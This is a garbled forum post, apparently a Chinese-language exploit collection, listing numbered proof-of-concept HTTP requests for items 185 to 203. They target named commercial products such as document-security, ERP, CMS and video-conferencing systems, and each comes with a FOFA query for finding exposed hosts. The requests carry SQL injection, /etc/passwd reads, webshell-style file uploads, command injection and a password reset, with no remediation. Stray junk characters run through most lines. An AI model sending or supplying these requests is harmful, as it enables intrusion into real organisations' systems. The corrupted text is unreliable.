insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')$ V f. O+ P( `) q6 W, Q R
$ P( l! { p# u* v" d, L6 x2 ^4 Y& M% @1 A" F
185. 瑞友天翼应用虚拟化系统SQL注入# P3 R0 |: y2 R* O/ e+ w
version < 7.0.5.1, J9 U' F& U% n# u; l
FOFA:app="REALOR-天翼应用虚拟化系统"
! o$ D4 ~% K6 T# L+ ~: r0 x. SGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.14 Q8 v8 v- a+ g
Host: host/ S0 b3 j% ?* [7 F( i5 x% J9 l
L4 ^3 W3 Q8 f2 \3 H3 o4 c! A0 o2 d6 b
186. F-logic DataCube3 SQL注入7 Z- R* o7 T, P) H& w1 _& s' P
CVE-2024-317504 p1 @9 V! d }* i3 r
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
/ y6 n9 @5 K, j4 v1 nFOFA:title=="DataCube3"
! i8 w9 s" v, P& C+ ]/ xPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
3 E1 \+ n0 Y- G* Q# ^Host: your-ip$ O: b: D, R, S4 j [6 z* ^" d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
) Z" }& w( W! w- d2 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.85 L5 d1 v5 K8 c' K4 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 e0 I$ r) W8 [# C; m5 ~
Accept-Encoding: gzip, deflate6 o: d) T4 l) h6 L. A. B4 k3 ?
Connection: close
9 R u7 U8 Y+ ^( a6 M; EContent-Type: application/x-www-form-urlencoded
5 j0 Q! ?0 ~. i z6 \
' q1 K' ?- F4 T) F! K+ Dreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
, p$ i+ F- ?) O& I S; k1 W# @& G, _# W3 ^+ e4 o
' j7 V+ b3 h% U6 A187. Mura CMS processAsyncObject SQL注入
& E3 Q% R6 }+ X( |4 x0 C2 _9 iCVE-2024-326407 L4 h6 v. ]$ o0 U& L; x
FOFA:"Mura CMS"
: H: x9 M# F, g0 R3 Z1 e3 ?' ~POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.13 R% E' S( A Z% Q$ D+ i# K
Host: your-ip: y0 E3 m( J5 c! w/ t" W3 L, V# T% ^
Content-Type: application/x-www-form-urlencoded W4 F: e T3 @) r( ?+ Q, O
" y. r4 ]7 ~1 p
0 l0 W6 o& \0 L7 }
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
1 N' q3 w5 e. e! N9 a( p& C* f D8 j7 b/ J2 n' C! l* G" c
, v. }: H- c& V/ H/ A$ s188. 叁体-佳会视频会议 attachment 任意文件读取
+ m# p* V* p# m/ H% ]version <= 3.9.7
2 L5 C \3 r* d+ {6 Z$ `FOFA:body="/system/get_rtc_user_defined_info?site_id"
6 b/ V9 e G* e: u7 j6 DGET /attachment?file=/etc/passwd HTTP/1.12 p1 f0 ?9 I/ ~/ r7 u, a9 c
Host: your-ip. O' k; b, J0 Z/ A% @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" Y" `! X% ~& B9 U$ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 G7 c) t: R: j8 L5 p* v7 ?( B( hAccept-Encoding: gzip, deflate1 N1 F5 Y% w8 A1 u' A
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 i! _( ^& ?6 a& QConnection: close/ s- K! q8 ?: |/ x# f
8 u) G2 I: S) s6 v* l5 i5 @
0 {& M0 B6 F" ^
189. 蓝网科技临床浏览系统 deleteStudy SQL注入, T( v$ F- |: \; \8 u+ ^* X/ w
FOFA:app="LANWON-临床浏览系统"
1 y3 |' o: r0 {GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1) T7 O% w- q7 v
Host: your-ip
- Y4 Z0 b. `: fUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" d8 f8 J5 k* D b# [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 k2 \ ~) `1 K( S2 P
Accept-Encoding: gzip, deflate' g$ f4 B3 f) S5 Z& G: U
Accept-Language: zh-CN,zh;q=0.9
; z9 k& l, \+ G4 oConnection: close
. _$ z7 q' t+ \( H, {4 F; @; [) c. f K
Y" ~2 s6 f) F$ e% b2 f190. 短视频矩阵营销系统 poihuoqu 任意文件读取$ W( \; \" V# U5 J- K" ^
FOFA:title=="短视频矩阵营销系统"! V3 E5 c/ T0 [9 X: t. G |9 N, _
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
+ G: d( M7 P% t% GHost: your-ip0 |) o" I- z2 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.369 |7 F5 n" d) \/ m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
% k4 D6 ?( a! j( ~) R- I. eContent-Type: application/x-www-form-urlencoded% S0 I5 O) X2 J+ q$ ?
Accept-Encoding: gzip, deflate$ S, a8 K( W: H4 d6 I
Accept-Language: zh-CN,zh;q=0.9
0 F6 N- j8 a* _' r# H" w, @4 Z- a- J& O6 I5 T- G
poi=file:///etc/passwd @9 H1 ]4 |" P9 w. o4 Y" u
! L0 X3 z6 T! m7 r' b* z
& c* x& \- z8 l( T7 ]191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入% Y+ `/ Z+ a8 ^% l( R+ V
FOFA:body="/CDGServer3/index.jsp"
5 D' t0 H; z9 H$ H0 D: \POST /CDGServer3/js/../NavigationAjax HTTP/1.1
( ^' D( P& |, x2 HHost: your-ip
2 N4 s( M+ Q# O( k* `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. i! J+ ?/ Y) a0 P7 j
Content-Type: application/x-www-form-urlencoded$ q5 x6 P$ V1 m; C* V4 R, V
: j* h% h8 P Acommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
- N1 @, q( U% ~: W2 L4 \ W6 T) q) D
+ x; R% y" i/ A
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传0 R$ W9 V, ]' y/ o) y
FOFA:title="用户登录_富通天下外贸ERP"# o1 l+ V7 g @
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
1 e+ ?0 S% ^3 _# M) N( f3 {! jHost: your-ip
: c. r. G4 l. UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 z8 J! e6 B2 dContent-Type: application/x-www-form-urlencoded
' y$ u9 L7 w& c4 o3 l' e
& F) h% `) N& X+ Y, m4 N( Y2 W* i0 L P5 B2 i' r; ~6 T4 O- D4 Y8 T6 I
<% @ webhandler language="C#" class="AverageHandler" %>
9 J6 D6 y. L$ z* U$ ]6 B# @using System;
+ S0 P, Z- b- Z) ^using System.Web;
9 D. s3 V+ }/ p& q0 ypublic class AverageHandler : IHttpHandler# ^9 k9 p l8 Q+ `5 e$ X. L
{3 Y' E, C# Y8 i$ R
public bool IsReusable
# a8 o% G& K2 B2 }5 p{ get { return true; } }
8 M: U' g& K f0 P/ z) r- H" Ppublic void ProcessRequest(HttpContext ctx)
3 b ]$ V% Z% t{
7 a; K- w9 M8 u' Actx.Response.Write("test");
" F; e6 o+ ?& `: J- g}
; |8 b7 \) E3 ]% u9 P! }3 @}9 N5 g, @/ D' ]7 b; h
# B) [/ ?" ~4 Y
+ p: w# k3 ?) Z; B1 R' X2 P; T1 n193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行$ K) F( Y% v: @( c
FOFA:body="山石云鉴主机安全管理系统"7 z" m! b4 Q& d1 ~3 `6 B
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
s8 R% E) B9 V; WHost:) d Z8 w, L4 e& i1 g9 w9 }" b
Cookie: PHPSESSID=2333333333333;
5 A7 `8 `5 G7 v0 |6 R' v1 t6 y6 X- [Content-Type: application/x-www-form-urlencoded$ ^, |4 n! `. |
User-Agent: Mozilla/5.09 O( g9 I6 j4 m4 W( k. ~( p
/ Q/ O1 c; t7 t$ q: }% o; I' D" z( S$ j& P D
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.14 e0 g* h7 ]2 f8 o3 p
Host:
4 [. H: R2 E2 eUser-Agent: Mozilla/5.0/ }4 x( j! V+ L' @8 ^& Z+ a' V; x
Accept-Encoding: gzip, deflate h2 C% Y( |: {; O( Y. m
Accept: */*
7 t7 ?* E, o2 p9 b, {Connection: close E" [6 _1 \+ B; R! ^' P5 ^
Cookie: PHPSESSID=2333333333333;6 @7 f2 k) |9 c5 x0 c- W
Content-Type: application/x-www-form-urlencoded+ w/ v- ~3 a2 p& m0 @
Content-Length: 84
/ a$ Q( H3 D0 q% r" k4 o* ^( s3 k
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
! Y- |1 Q o! h3 V
% c$ Y8 O( ~7 ]. ?' a' ]9 G X/ y8 I. j4 M8 |! p
GET /master/img/config HTTP/1.18 K/ a% X2 y" V* C$ `
Host:% t% {2 @# s( b6 r0 C# Y# u( A
User-Agent: Mozilla/5.0( f& L' K3 z, Z" w) o' ?
! T" R1 B8 z; Z# a& p
6 y3 N9 p/ Z: R8 p8 I194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传% g# M! R4 `5 c+ e! h C. f
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在& g1 H6 q3 I' T! Q6 g" e
% N9 i9 v1 C! E$ E
POST /servlet/uploadAttachmentServlet HTTP/1.1
, m; Q% K- T( `* V! eHost: host
. B* Z* `$ F. j# P- J2 A) wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36; Y8 H7 @+ v; L5 Y0 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 ?# v+ h. y/ c+ }6 U& h; p; \3 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) U# l5 b# U+ G5 ]; |! aAccept-Encoding: gzip, deflate
1 A3 Y; g! H4 u* t3 ?# E% AConnection: close
8 H8 Z8 T4 @, j7 M! F9 ]; yContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk: [6 H0 _$ r4 w' m3 G
------WebKitFormBoundaryKNt0t4vBe8cX9rZk6 ? n- a8 M, {* a+ g* P, W! o% e
$ }6 q$ T3 @$ p1 x' U& ]Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"% p# x( L6 z* q4 q0 Y
Content-Type: text/plain, N; u' b9 q- R+ `" \
<% out.println("hello");%>/ I- _) }4 q) b& u$ ^7 c A
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- `+ G7 w1 ~0 E' q, JContent-Disposition: form-data; name="json"
+ U7 F) _' n2 h! { {"iq":{"query":{"UpdateType":"mail"}}}% ]: F3 w5 m: q4 g* ~
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
# { C$ T( Z1 }6 i* v# X% _5 j+ }, D, @/ I8 S# R
, j: g1 Z/ ]* H' D% a; C( b195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
8 Q4 F8 q4 `% X0 kFOFA:title=="飞鱼星企业级智能上网行为管理系统4 Y' U7 X+ H" ?7 W# h1 t* f; M
POST /send_order.cgi?parameter=operation HTTP/1.1$ U2 S) E$ F( a2 K1 V" c
Host: 127.0.0.1
3 f6 ?! K& K: S0 m7 F0 D# Z" rPragma: no-cache" \( ^" a/ n* f- d4 e
Cache-Control: no-cache
1 ?2 o& n) K" gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 ?- M' J- C, V' h! W8 D
Accept: */*
2 ?/ ?" U" K* \( FAccept-Encoding: gzip, deflate
; x* K6 ~9 f5 z) U: M* uAccept-Language: zh-CN,zh;q=0.9; t) x4 e! X. ?6 w* F
Connection: close
5 }, |8 l) j+ uContent-Type: application/x-www-form-urlencoded2 Z+ b3 ~! T& W9 m9 Z
Content-Length: 68
* [/ }$ y$ L1 w- K
' `+ g; Y) E7 h9 C j{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"} ]9 v, H2 Q4 E$ d) ?2 Y
$ C, T* i3 ]4 b* v2 x
1 ~7 {6 z% q2 |196. 河南省风速科技统一认证平台密码重置
7 d ^! U* H4 J& ^ cFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
0 ?9 m1 e2 l$ l, N7 Q: A Q" }POST /cas/userCtl/resetPasswordBySuper HTTP/1.1" Z2 }) q; T- J# d0 r2 [% R" [" n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36& `! [* M4 M4 R5 Y
Content-Type: application/json;charset=UTF-8, y" D6 J+ _$ \6 \ _
X-Requested-With: XMLHttpRequest& r7 t ~: c) {5 r+ K/ ?
Host:1 v& y/ a) @$ v
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' R7 A! B: q% s- {% X' Q
Content-Length: 45
" X" v y. F+ y! j4 @8 I& YConnection: close
. J# T$ e/ b: J: t- M% t o' @: a( m* o& ?
{"xgh":"test","newPass":"test666","email":""}
1 B# ?9 P9 L9 g8 L5 ^9 d
( k5 ~( v- _; g0 m$ H ]7 f! J. O9 V3 M9 P
9 n2 N& u2 h. _3 _2 C197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
' G9 k9 g+ H1 B/ HFOFA:app="浙大恩特客户资源管理系统"
- c) Z5 k# t% e2 E, P& L$ pGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
4 y/ D5 l8 ~9 Y" _; M7 e! ^Host:
6 m- }/ y3 j8 {% o3 r4 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
4 \4 O k( p3 I7 lAccept-Encoding: gzip, deflate
4 u1 T4 g% u' H" v& @0 jConnection: close
+ n# ?6 O" {1 i% _; ~0 V7 O3 M. A4 w$ G2 V
1 w9 W- u, [6 R, E
. N7 p7 |3 k, ~2 M; c0 d# S
198. 阿里云盘 WebDAV 命令注入7 x5 e1 b4 A0 ?# y0 F% z
CVE-2024-29640. m$ [/ Q# C3 q! i+ P/ @2 Y
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
9 J u: ]& j+ M$ d# C7 e0 n* BCookie: sysauth=41273cb2cffef0bb5d0653592624cf645 P! @! n; y4 {* u, b% V- B% C
Accept: */*# Y# V; S+ ^) A5 w+ E' m( R
Accept-Encoding: gzip, deflate
' L J7 I+ |2 @3 j) K$ ~+ \Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
3 z9 m! }# A4 u1 N' z4 A5 uConnection: close4 _' ^* t, T) b2 {& ?( H
8 x4 w# c9 M- I! t
. d1 F7 h5 w: @& u
199. cockpit系统assetsmanager_upload接口 文件上传( M) L1 _: \, k8 r% i5 T
- F7 Z( t0 Z& a$ `% W z" n1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:2 [+ E) I& J# R% G9 Z
GET /auth/login?to=/ HTTP/1.1( B. |8 j' k! W( ]
6 V c( I+ Y* a" F2 p* z! F
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
; h( L9 l3 J; v) M9 t, s* u* r5 D2 B2 H9 B
2.使用刚才上一步获取到的jwt获取cookie:0 G- F) z% U+ ^* Y9 F# S
% s% ~1 h, h9 K1 f4 P8 }* W
POST /auth/check HTTP/1.15 d4 B/ U% D$ H/ R$ u |7 N
Content-Type: application/json/ _9 F) w `3 p; f
; \2 B* l: g0 F( S{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}2 S3 W% m* T; h- X9 k, j: s* t/ l
, U" S) p: o9 ~. s
响应:200,返回值:# e5 r- t1 d9 {% a$ S
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
W' `0 K O Q# nFofa:title="Authenticate Please!"
n+ f4 {0 A) R+ ^) yPOST /assetsmanager/upload HTTP/1.1
+ N p; ^- [+ k% [& OContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3) H; _" Y& p# A9 D
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
5 v% K; w/ R3 h: B! I, c
5 j( M- t) M. t7 K }/ W-----------------------------36D28FBc36bd6feE7Fb32 _9 a# g3 R9 P a, y; C
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
3 \, z! _7 _+ ~( h: yContent-Type: text/php
7 C2 ]7 t, B# Y- O% [$ ~0 x4 o1 F7 F8 f; O
<?php echo "tttt";unlink(__FILE__);?>) Z6 Y8 n+ V1 k( `. ]5 Y- r8 O
-----------------------------36D28FBc36bd6feE7Fb3
- |& i; A& G, [8 z: c2 F" aContent-Disposition: form-data; name="folder"
& G( }1 N2 @$ J# f4 k- f5 s1 [1 v
+ ]4 _ ]( E& N. V& ?+ ~-----------------------------36D28FBc36bd6feE7Fb3--
6 I/ d0 d$ |6 r' [( v$ B9 y9 M1 d: V( O: }! n6 z) K" p
5 a% C# f/ b9 \4 q+ n' a
/storage/uploads/tttt.php
& K- c1 N; ^$ G0 k" ^( i' Y/ q& Q& G0 M& y( O; }# M' E
200. SeaCMS海洋影视管理系统dmku SQL注入4 j* ?- \/ D2 C) ?: C- D! a
FOFA:app="海洋CMS"% m' \' i I0 Y8 }/ Z$ d9 M9 P, M7 _
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1 L# V$ x+ f. \! Q
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
0 W( u1 @6 d! I( _+ v7 F% F' y9 c3 OUpgrade-Insecure-Requests: 19 z9 o0 V' T2 ]( E/ @3 }
Cache-Control: max-age=0: [9 K& t5 Y4 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- g! K6 c. X" g5 d& OAccept-Encoding: gzip, deflate3 F. w H. `$ w2 I9 n E
Accept-Language: zh-CN,zh;q=0.9
# M) G6 A, R0 d h, L6 m4 Q8 o3 p" {$ f; D
8 O q( k: C3 C+ o7 p$ S
201. 方正全媒体新闻采编系统 binary SQL注入
/ U; ?" i5 y. P2 Z# z1 f( RFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统" J# Q4 }6 I8 t- X
POST /newsedit/newsplan/task/binary.do HTTP/1.1
5 e8 Q" ~; D# p# @Content-Type: application/x-www-form-urlencoded) j% U5 @) A' a* Q. K- O3 B; q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 `! Y9 r" g3 m9 O3 `8 ^% X. e
Accept-Encoding: gzip, deflate
7 g A1 J7 b. _' m) V$ n" ~4 MAccept-Language: zh-CN,zh;q=0.9
. T% W& m; S: [ zConnection: close
$ b8 a- C f5 M- Z& Y) C: A `5 I& b. ]& K
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1# s, D0 w$ D3 S4 D! G
% N# G1 x5 m! i) w$ N& A4 b' Z
9 Q% j' U' h5 y202. 微擎系统 AccountEdit任意文件上传
! \- O* R6 o' Q# L- S; AFOFA:body="/Widgets/WidgetCollection/"( Z: r( ~& L4 k% r d5 M, W8 |
获取__VIEWSTATE和__EVENTVALIDATION值+ J6 j9 H" `& r3 Z
GET /User/AccountEdit.aspx HTTP/1.1
; ]/ n8 m2 N7 R; q4 }Host: 滑板人之家
, D, U9 p/ x: m& O6 y3 f1 K kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.314 u2 b$ L6 g% `
Content-Length: 0
! Z" v7 }. k) M4 k" j i0 U4 M! p4 c% u7 ]& a' G
. K1 `: F) Y0 Q- z! _( q替换__VIEWSTATE和__EVENTVALIDATION值9 Y* Q) W, Q# I/ b8 u, M: L
POST /User/AccountEdit.aspx HTTP/1.1# G" Z# w8 p' }, T; X4 O6 I# t5 \) w/ s
Accept-Encoding: gzip, deflate, br
, f" g& T; L# R/ n+ S+ L1 K) NContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687; r# o- C8 D! K. B4 H ?( G
# h; _ J1 N' @
-----------------------------786435874t385875938657365873465673587356872 y$ k1 q% M# Y& O. J- H
Content-Disposition: form-data; name="__VIEWSTATE". k. t0 J1 m/ K }: w# o( x; @
3 w" D0 o" m0 E( d__VIEWSTATE
v0 M& `! N U# L-----------------------------786435874t38587593865736587346567358735687
9 X9 b f. i$ E! \+ G3 vContent-Disposition: form-data; name="__EVENTVALIDATION"
6 v5 ~1 K$ n4 J0 ]; T8 }
?7 i1 X. C1 I__EVENTVALIDATION
# L" Y5 X0 ~" a: [" {8 f7 L9 w/ t-----------------------------786435874t38587593865736587346567358735687
/ J$ N4 [, X: g4 k% E- K, IContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"- }3 e8 e& Q8 `6 }% p7 M
Content-Type: text/plain' \' z5 m8 \, e0 K- q( E
8 r7 J$ n$ R7 K, E/ H6 A% J# R
Hello World!4 U% n5 m* B6 Y: q
-----------------------------786435874t38587593865736587346567358735687
- b# E/ w# m; u! `/ j( @Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"( t/ |9 ?1 b" S! x8 z5 Z( e- O- I
5 ^& R- p& d7 W- K
上传图片
( E$ l+ Z/ S* h3 V, V. ~-----------------------------786435874t38587593865736587346567358735687
% z8 `& G. v! n# F* j9 BContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
4 [7 Y7 @$ ^# Z( E
$ x: x6 y. n/ y+ u+ Y& l& \4 ~& P; b: e
-----------------------------786435874t385875938657365873465673587356873 y8 B+ h, E6 X$ M
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
" u- p" g+ T" Q1 v0 i6 x; z
) m' O0 R& \8 P. ?, P+ {
- V9 U- J' F x+ u J5 G) ^! @( a-----------------------------786435874t38587593865736587346567358735687--( f0 Q1 D3 H1 w6 ~$ m3 @
; O4 ?( \ o' P" j w7 c/ V9 r U
" f! k3 r5 C3 A7 P' y/_data/Uploads/1123.txt9 m2 D0 q4 S. ?) r
. E: E( ] z' u% u
203. 红海云EHR PtFjk 文件上传
/ c9 M' j" f3 F6 d) OFOFA:body="RedseaPlatform"
2 |9 F: L7 _- S0 p1 n% SPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1( K& v6 _ m S2 c
Host: x.x.x.x( ?, [5 q; F$ E# U+ }5 L
Accept-Encoding: gzip% |6 k _! b6 W5 L( i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- M5 f! y3 n5 a0 N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
! A7 _ g- x& V4 W2 t# K. S; ZContent-Length: 2106 ]% R) |7 L5 g0 w5 P
$ s3 S: E' H; {4 a+ u
------WebKitFormBoundaryt7WbDl1tXogoZys4, N% _' p4 D6 O( a9 x
Content-Disposition: form-data; name="fj_file"; filename="11.jsp") O. v) F* a, |6 f: X) x
Content-Type:image/jpeg
* f% \1 _) D$ L6 J2 g% o( v- Z, `1 Z; J+ V0 }4 Z, K7 g1 J
<% out.print("hello,eHR");%>
6 o( u6 n% e4 T7 x! @------WebKitFormBoundaryt7WbDl1tXogoZys4--5 @ W+ D% i+ P/ j
* h! v. n6 M/ I3 X, j" s2 @ ' A5 g/ \2 w% R6 l) `' Z
$ t. A: k. f* [- m o7 E
6 r9 E* R% _: Y- |
5 a- M( G6 J2 G& F8 A6 Y
* O8 v2 v: A/ y" [/ b |
发表于 2024-6-5 14:31:29
收藏
支持
反对